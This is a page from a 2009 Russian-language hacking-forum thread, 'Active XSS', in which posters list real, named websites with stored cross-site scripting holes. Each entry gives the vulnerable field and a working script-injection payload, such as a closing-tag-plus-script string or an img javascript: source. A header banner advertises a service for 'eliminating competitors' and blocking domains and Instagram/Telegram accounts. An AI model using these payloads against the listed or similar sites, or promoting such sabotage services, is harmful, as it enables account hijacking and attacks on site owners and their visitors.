Активные Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 35 из 54

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#341

21.07.2009, 11:27

~~петрович~~

Banned

Регистрация: 25.04.2009

Сообщений: 3

С нами: 8971506

Репутация: 10

http://i.ua
Активный XSS в теле письма:

Цитата:

Просто до безобразия, keep it priv8

#342

23.07.2009, 20:02

Inotsee

Новичок

Регистрация: 24.06.2009

Сообщений: 18

С нами: 8884502

Репутация: 3

Цитата:

Сообщение от петрович

http://i.ua
Активный XSS в теле письма:

Просто до безобразия, keep it priv8

там же во вкладке фото создаем альбом с названием: <script>alert("XSS")</script>. Жаль на маил.ру таких не осталось))

#343

03.08.2009, 22:25

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

С нами: 8982831

Репутация: 37

http://www.for.kg/ru/public_reporter/134/ . В коментарии вставляем "/><script>alert(/xss/)</script>

и получаем XSS

#344

03.08.2009, 23:26

ZARO

Познающий

Регистрация: 17.04.2009

Сообщений: 59

С нами: 8982831

Репутация: 37

http://www.kazakh.ru/talk/mmess.phtml?idt=21316 Тут тоже самое, уязвимое поле коментария.

#345

08.08.2009, 06:26

-JC-

Познающий

Регистрация: 10.03.2009

Сообщений: 54

С нами: 9037788

Репутация: 50

http://www.arsenal.com/ В поле поиска
http://www.arsenal.com/login в поле Username

#346

12.08.2009, 23:41

xTray

Новичок

Регистрация: 29.01.2007

Сообщений: 1

С нами: 10148731

Репутация: 0

http://testskills.ru/ - в полях ввода имя,фамилия,очество,емаил

#347

13.08.2009, 02:33

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

С нами: 9083308

Репутация: 719

Цитата:

Сообщение от Kusto

это пассивка

активка, поле коммент

Цитата:

http://stylemania.km.ru/Modelnoe_portfolio/comment

"/><script>alert(/xss/)</script>

Последний раз редактировалось satana-fu; 18.08.2009 в 04:39..

#348

18.08.2009, 04:11

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

С нами: 9083308

Репутация: 719

активка в гостевой сайта Мульфильмы

Цитата:

http://www.multfilmy.ru/gesta/gesta.php

<img src="javascript:alert()">

Радио 20 (Активка)

Цитата:

http://station20.ru/track/923/

<img src="javascript:alert()">

Сайт Макса Фадеева (Активка )

Цитата:

http://www.fadeev.ru/gruppa-kitai-v-zhurnale-bravo#comments

"/><script>alert(/xss/)</script>

активка в поле имя и фамилия

Цитата:

http://www.kieves.com/index.shtml?titul=regist&dannye=1

"/><script>alert(/xss/)</script>

Последний раз редактировалось satana-fu; 18.08.2009 в 05:38..

#349

19.08.2009, 15:12

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

С нами: 9083308

Репутация: 719

активка

Цитата:

http://www.migrants.ru/messages/?page=1
http://www.migrants.ru/forum/theme.php?

Ваще никакого фильтра нет, пролазит любой скрипт можно так сказать, да плюс еще сообщения дублируются трижды

Последний раз редактировалось satana-fu; 19.08.2009 в 15:28..

#350

21.08.2009, 14:44

W@r.N0i$e

Участник форума

Регистрация: 02.06.2009

Сообщений: 143

С нами: 8916610

Репутация: 114

http://www.bis.biysk.ru/index.phtml?/otzyv.phtml
Уязвимое поле: Тема.

Страница 35 из 54

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход